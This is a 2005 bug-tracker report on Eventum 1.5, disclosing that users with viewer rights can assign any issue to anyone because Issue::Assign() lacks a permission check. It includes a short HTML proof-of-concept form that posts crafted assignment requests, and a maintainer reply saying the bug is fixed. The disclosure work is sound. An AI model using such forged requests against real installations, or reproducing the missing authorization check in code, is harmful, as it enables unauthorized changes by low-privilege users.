Bug #9097 Hack: viewer can assigned any issue to anyone.
Submitted: 10 Mar 2005 17:57 Modified: 10 Mar 2005 18:43
Reporter: Paul Mach Email Updates:
Status: Closed Impact on me:
None 
Category:Eventum Severity:S2 (Serious)
Version:1.5 OS:N/A
Assigned to: Bryan Alsdorf CPU Architecture:Any

[10 Mar 2005 17:57] Paul Mach 
Description:
If a person has viewer permissions, they can assign any issue to any user. They can even assign themselves to issues.

To do this, the "viewer" needs the issue ids and the user id. 

Although this isn't a security issue exactly, it can be a huge inconvenience. Any installation that allows anyone to signup as a user is susceptible.

How to repeat:
Login as a Viewer
Open another browser window and load this file after changing the form action to the path for the desired installation.

<html><body>
<form action="http://localhost/popup.php" method="post" />
<input type="hidden" name="cat" value="assign">

Enter Issue Ids (1 per box)<br />
<input type="text" name="item[]" value="" size="3">
<input type="text" name="item[]" value="" size="3">
<input type="text" name="item[]" value="" size="3">

<br /><br />
Enter in the User id you want to assign to these issues
<input type="text" name="users">
<br /><br />
<input type=submit>
</form>
</body></html>

Enter in the in the issue ids.
Enter in the user id
Click Submit.

Suggested fix:
Some sort of user permission checking is Issue::Assign()
[10 Mar 2005 18:43] Bryan Alsdorf 
Thanks for the report, this is now fixed and will be in our 1.5.1 release.